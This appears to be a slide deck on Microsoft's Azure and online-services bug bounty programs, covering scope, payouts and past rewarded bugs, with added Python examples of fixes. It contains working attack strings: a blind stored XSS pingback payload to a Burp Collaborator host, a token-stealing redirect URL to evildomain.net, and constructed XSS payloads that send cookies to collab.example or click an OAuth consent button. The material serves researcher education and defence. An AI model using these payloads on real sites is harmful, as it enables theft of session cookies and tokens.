How to be successful in the Azure bug bounty and The Microsoft Bounty Program overview Michael Hendrickx (@ndrix) Akila Srinivasan (@akilsrin)
Agenda • Azure Attack Surface • Azure Bug Bounty background • Past bounty payouts • Overall and Azure Bug Bounty scope • Get cracking: Azure offers / How to get started
Azure Attack Surface
• Compute: VMs, VM scale sets, Batch apps, Workers, VM Marketplace
• Apps: WebApps, Mobile Apps, App Deploy, OnPrem Apps
• Data: SQL, NoSQL, Storage (queue, table, blobs, …), Cache, Backup, Media Services, CDN
• Networking: Virtual networks, Gateways, Load balancing, Network security groups, Data center
• Identity: Multiple tenants, User Management, User Self-Services, 2FA, Federated identity
Azure Bug Bounty Background • In April 2015 we started this bounty program to give researchers and customers an easy way to pentest their Azure subscriptions • We’ve expanded the bounty since to include over 50 domains and endpoints
Launch of double bounties in Exchange Online and the Office 365 portal • The domains that will be receiving double rewards are: • portal.office.com • outlook.office365.com • outlook.office.com • outlook.live.com • *.outlook.com • Payout range is: $1,000 to $30,000 USD • Duration: March 1 to May 1, 2017 For additional information about this program: https://technet.microsoft.com/en-us/dn800983
Microsoft Services Bounty Programs, Old and New
• Mitigation Bypass Bounty: June 2013
• Microsoft O365: Sept 2014
• Azure (NEW): Apr 2015
Impact and Payouts For additional information about this program: https://technet.microsoft.com/en-us/mt797549.aspx
Microsoft Edge Beta Web Platform Bounty (Part 2)
• Submit: Remote Code Execution (RCE) vulnerabilities in Microsoft Edge, and bugs that lead to violations of W3C standards that compromise the privacy and integrity of important user data
• Bugs must reproduce on the most recent Windows Insider Preview (WIP) slow build or the Creators Update
• This continues our effort to find bugs in earlier stages of development
• Program runs Aug 4, 2016 to May 15, 2017
• RCE = $15,000; UXSS / Referer spoofing / compromise of privacy or integrity of user data = $6,000
For additional information about this program: https://technet.microsoft.com/en-us/mt761990.aspx
.NET Core and ASP.NET Core Bug Bounty • Vulnerabilities in the latest available .NET builds • Program began September 1, 2016 (continuous) • All bugs have to reproduce in the latest beta or release candidates to qualify • Pays up to $15,000 USD For additional information about this program: https://technet.microsoft.com/en-us/mt764065
Online Services Bug Bounty Program: O365 + Azure • Earn bounty on submitted vulnerabilities for participating Online Services provided by Microsoft (O365 and Azure properties) • Vulnerability type examples • XSS • CSRF • Unauthorized cross-tenant data tampering or access (for multi-tenant services) • Insecure direct object references • Injection vulnerabilities • Authentication vulnerabilities • Server-side code execution • Privilege escalation • Significant security misconfiguration (when not caused by the user) • Payout range is: $500 to $15,000 USD • Double bounty on Exchange Online and the O365 portal for the next 2 months Follow us on the MSRC Blogs to get information on new bounties https://blogs.technet.microsoft.com/msrc/ For additional information about this program: https://technet.microsoft.com/en-us/dn800983
Hyper-V Hyper-V escapes that will receive a bounty • Guest-to-Host • Guest-to-Guest • Guest-to-Host DoS (non-distributed, from a single guest) Total payout range is: Up to $100,000 USD For additional information about this program: https://technet.microsoft.com/en-us/dn425049
Mitigation Bypass and Bounty for Defense A security mitigation improves on the security of our products Submit a novel mitigation bypass against our latest Windows platform, and/or a defense idea that would block an exploitation technique that currently bypasses the latest platform mitigations • Stack corruption (/GS, SEHOP, and SafeSEH) • Heap corruption (metadata integrity checks) • Code execution (DEP, CFG, ACG and ASLR) Total payout range is: Up to $200,000 (Mit. Bypass + Bounty for Defense) For additional information about this program: https://technet.microsoft.com/en-us/dn425049
Past payouts • Highest payout bugs to date
VNet Point to Site Auth Bypass
• MSRC 34219: Azure VNet Gateway auth bypass
• An Azure VNet (Virtual Network) is your cloud-based, logical network: your IP ranges, DNS servers, …
• On-prem connectivity uses the VNet Gateway over the Secure Socket Tunneling Protocol (SSTP): TLS traffic is tunnelled over 443/tcp, and control packets inside the HTTPS session set up SSTP state
• A specially crafted sequence of SSTP EAP-TLS messages during connection setup gave access to the virtual network, no credentials needed
$13k+ bug bounty paid
Token leaking
• MSRC 32377: Token theft in redirect URL
• URL decoding converts %XX to the corresponding character, but only one round is applied: %252f becomes %2f, not /
  https:%2f%2faccount.windowsazure.com%252f@evildomain.net -> https://account.windowsazure.com%2f@evildomain.net
• A prefix check on the decoded string sees account.windowsazure.com, but the browser treats everything before the @ as the username to log in with, so evildomain.net, not account.windowsazure.com, receives the token
$13k bug bounty paid
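The double-decoding trick above, worked through in Python. This is an added example, not code from the presentation or from the affected service: the redirect parameter is the one quoted on the slide, while TRUSTED_REDIRECT_HOSTS, LEGIT_PARAM and the function names are assumptions. It contrasts a prefix check on the once-decoded string (which passes) with parsing the URL the way the browser will, where the host is whatever follows the last "@".

```python
from urllib.parse import unquote, urlsplit

# Assumed allowlist of hosts the sign-in flow may redirect (and hand a token) to.
TRUSTED_REDIRECT_HOSTS = {"account.windowsazure.com"}

# The double-encoded redirect parameter quoted in the report, plus a constructed
# legitimate parameter for comparison.
ATTACK_PARAM = "https:%2f%2faccount.windowsazure.com%252f@evildomain.net"
LEGIT_PARAM = "https:%2f%2faccount.windowsazure.com%2fsignin"


def decode_once(param):
    """One round of %XX decoding, as the web framework applies before the value
    is copied into the Location header. %252f therefore becomes %2f, not '/'."""
    return unquote(param)


def naive_is_trusted(param):
    """Vulnerable check: a string-prefix test on the decoded value.
    The attack parameter passes because the trusted host is the *username*."""
    return decode_once(param).startswith("https://account.windowsazure.com")


def browser_target_host(url):
    """Host a browser will actually connect to. urlsplit, like browsers, treats
    everything before the last '@' in the authority as userinfo."""
    return urlsplit(url).hostname


def is_trusted_redirect(param):
    """Hardened check: parse exactly the string that will be emitted, refuse any
    userinfo at all, and compare the parsed host against the allowlist."""
    parts = urlsplit(decode_once(param))
    if parts.scheme != "https":
        return False
    if "@" in parts.netloc or parts.username is not None:
        return False
    return parts.hostname in TRUSTED_REDIRECT_HOSTS


if __name__ == "__main__":
    for p in (ATTACK_PARAM, LEGIT_PARAM):
        decoded = decode_once(p)
        print(decoded)
        print("  prefix check:", naive_is_trusted(p))
        print("  browser host:", browser_target_host(decoded))
        print("  hardened    :", is_trusted_redirect(p))
```

Note that decoding "until stable" would not help here either: a second round turns %2f into "/" and makes the string look benign, yet the browser only ever sees the once-decoded form. The check has to run on the exact bytes that go into the response.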
OAuth Authorization XSS
• MSRC 31586: XSS on the OAuth authorization page
• The application name (e.g. MyApp) was not properly filtered for JavaScript
• Injected script could initiate DOM actions, such as clicking the “Yes” button on the consent prompt (“Authorize MyApp to access: account, email…”)
[Diagram: user logs in at the OAuth provider, sees the “Welcome Michael!” consent prompt with Yes / No buttons]
$12k bug bounty paid
Blind Stored XSS
• MSRC 33555: datamarket.azure.com XSS vulnerability
• The injected field is viewed by backend engineers, so the payload’s only job is a “pingback” to a custom Burp Collaborator domain
URL-encoded:
javascript%3a%2f*<%2fscript><svg%2fonload%3d'%2b%2f"%2f%2b%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f\%2fue73s5anaf53xull8bw0\.burpcollaborator.net%2f).replace(%2f\\%2fg%2c[]))%2f%2f'>
Decoded:
<svg/onmouseover=1/+/[*/[]/+((new(Image)).src=([]+/\/ue73s5anaf53xull8bw0\.burpcollaborator.net/).replace(/\\/g,[]))//'>
$2k bug bounty paid
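One example for both XSS cases above (the unescaped OAuth application name and the blind pingback payload). This is added code, not from the presentation or from either affected service: the consent template, the two payloads and collab.example are constructed stand-ins, and the pingback uses a plain img/onerror rather than the regex-obfuscated payload on the slide. The vulnerable renderer interpolates the untrusted name straight into HTML; the hardened one passes it through html.escape. A small HTMLParser audit then reports what a browser would actually see as elements, event handlers and external loads.

```python
import html
from html.parser import HTMLParser

# Constructed payloads (not from the original reports).
# 1) An OAuth app name that clicks the consent button for the victim.
APP_NAME_PAYLOAD = (
    "MyApp<script>document.querySelector('#authorize-yes').click()</script>"
)
# 2) A blind stored XSS payload: it cannot show the attacker anything directly,
#    so it just makes the viewer's browser call an attacker-controlled host.
#    collab.example stands in for a Burp Collaborator style listener.
BLIND_PINGBACK_PAYLOAD = (
    '<img src="https://collab.example/ping" '
    'onerror="(new Image).src=\'https://collab.example/c?\'+document.cookie">'
)

CONSENT_TEMPLATE = "<p>Authorize {name} to access: account, email</p>"


def render_consent_vulnerable(app_name):
    """Interpolates the untrusted application name straight into HTML."""
    return CONSENT_TEMPLATE.format(name=app_name)


def render_consent_safe(app_name):
    """HTML-escapes the name for the text context. quote=True also escapes
    quotes, so the same output is safe inside a double-quoted attribute."""
    return CONSENT_TEMPLATE.format(name=html.escape(app_name, quote=True))


class _MarkupAudit(HTMLParser):
    """Records what a browser would treat as elements, inline event handlers
    and external resource loads in a rendered fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []
        self.external_srcs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append("%s@%s" % (tag, name))
            if name == "src" and value and value.startswith(("http://", "https://", "//")):
                self.external_srcs.append(value)


def markup_seen_by_browser(fragment):
    """Returns (tags, event handlers, external src URLs) parsed from fragment."""
    audit = _MarkupAudit()
    audit.feed(fragment)
    audit.close()
    return audit.tags, audit.handlers, audit.external_srcs


def is_inert(fragment, allowed_tags=("p",)):
    """True if the fragment contains only the template's own tags, no inline
    event handlers and no loads from external hosts (no pingback possible)."""
    tags, handlers, srcs = markup_seen_by_browser(fragment)
    return all(t in allowed_tags for t in tags) and not handlers and not srcs


if __name__ == "__main__":
    for payload in (APP_NAME_PAYLOAD, BLIND_PINGBACK_PAYLOAD):
        print("vulnerable:", markup_seen_by_browser(render_consent_vulnerable(payload)))
        print("hardened  :", markup_seen_by_browser(render_consent_safe(payload)))
```

The audit is only a convenience for seeing the difference; the fix is the escaping at render time, applied per output context (text node, attribute value, URL, script), not a blocklist of tags. For the blind case, the external-load check is the point: a payload that is never echoed back to the attacker still proves execution the moment collab.example receives a request.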
Insecure links • MSRC 33238: HTTP links on account.microsoft.com • On secure HTTPS pages, some hyperlinks have a hardcoded “http://” scheme rather than “https://” or a scheme-relative “//” • A man-in-the-middle could redirect the traffic flow $500 bug bounty paid
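A quick way to hunt for this class of bug in your own tenant's pages: walk the HTML and list every navigational or resource URL that hard-codes http://. This is an added example, not tooling from the presentation; SAMPLE_PAGE is a constructed page (not the real account.microsoft.com markup), and the set of tag/attribute pairs in URL_ATTRS is a reasonable assumption rather than an exhaustive list.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTTPS page with a mix of link styles (not real site markup).
SAMPLE_PAGE = """
<html><body>
<a href="https://account.microsoft.com/privacy">Privacy</a>
<a href="http://account.microsoft.com/help">Help</a>
<a href="//cdn.example/lib.js">Scheme-relative</a>
<a href="/settings">Path only</a>
<script src="http://cdn.example/lib.js"></script>
<form action="http://account.microsoft.com/login" method="post"></form>
</body></html>
"""

# Assumed tag -> attribute pairs worth checking; script/iframe/form are the
# serious ones, since a MITM on those gets code execution or credentials
# rather than just a downgraded page view.
URL_ATTRS = {
    "a": "href", "link": "href", "script": "src",
    "img": "src", "iframe": "src", "form": "action",
}


class InsecureLinkFinder(HTMLParser):
    """Collects (tag, url) for every URL with an explicit http:// scheme."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        wanted = URL_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name != wanted or not value:
                continue
            url = value.strip()
            # "//host/x" and "/path" have no scheme and inherit https; only an
            # explicit http:// scheme is a finding.
            if urlsplit(url).scheme.lower() == "http":
                self.findings.append((tag, url))


def find_insecure_links(html_text):
    """Returns the plaintext-scheme URLs in document order."""
    finder = InsecureLinkFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


def active_content_findings(findings):
    """Subset where a MITM would control executed code or a posted form."""
    return [f for f in findings if f[0] in ("script", "iframe", "form")]


if __name__ == "__main__":
    for tag, url in find_insecure_links(SAMPLE_PAGE):
        print("%-6s %s" % (tag, url))
```

Run it against saved responses from your own tenant; the same walk also catches http:// in `<link rel="stylesheet">` and `<img>`, which modern browsers block or flag as mixed content but which still indicate the template is wrong.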
Online Services Bug Bounty Program The highest bounties can be earned on: • Authentication vulnerabilities (OAuth, SAML 2.0 related bugs) • Privilege escalations • XSS and CSRF (on high traffic, high impact sites) For additional information about this program: https://technet.microsoft.com/en-us/dn800983
In-Scope Domains List available at: https://technet.microsoft.com/en-us/security/dn800983
Bug Bounty Out-Of-Scope • Out of scope domains* • User generated content • Testing outside of your own tenant • Any kind of Denial of Service testing • High volume scanning • Moving beyond “proof of concept” • Abusing gathered credentials • Phishing / social engineering attacks
Rewarding scheme • CVSS 3 Score to calculate bounty • Impacted targets • Bug affects users in same tenant or across tenants? • All users? • Bounty: • Cash payout + MSDN Credits + Azure Credits
Horizontal Abuse vs Vertical Abuse
• Horizontal abuse: access others’ resources (e.g. User A reaching User B’s data at the same privilege level)
• Vertical abuse: privilege escalation, authentication bypass (moving up a level)
Privilege levels, highest to lowest: Fabric Admin > Tenant Admin > App Admin > User > Anonymous users
Get cracking (no pun intended) • Azure offers: • Visual Studio / MSDN subscription: $150 Azure credits / month • Free for one month ($200 credit): 14 VMs, 40 SQL DBs, 8TB of storage, Redis caches, machine learning, Azure Active Directory, … • Keep going for free: AAD, machine learning, log analytics, virtual network, web/mobile apps, … https://azure.microsoft.com/en-us/free/
Your card won’t be charged; in fact, you have to manually enable charging.
The “old” portal, https://manage.windowsazure.com Also covered in bug bounty
Adding enterprise applications to your tenant can be done through different channels.
Bounties Paid To Date
• Mitigation Bypass, Bounty for Defense and BlueHat Prize: > $600,000 USD
• Online Services Bug Bounty: > $400,000 USD
• Software Bounties: > $200,000 USD
Finder Appreciation and Retention (FAR) • For more information: • https://technet.microsoft.com/en-us/security/mt767986 • https://technet.microsoft.com/en-us/security/dn469163
Making It To The MSRC Top 100 List • The severity, quality and quantity of the bugs you send determine your rank in the MSRC Top 100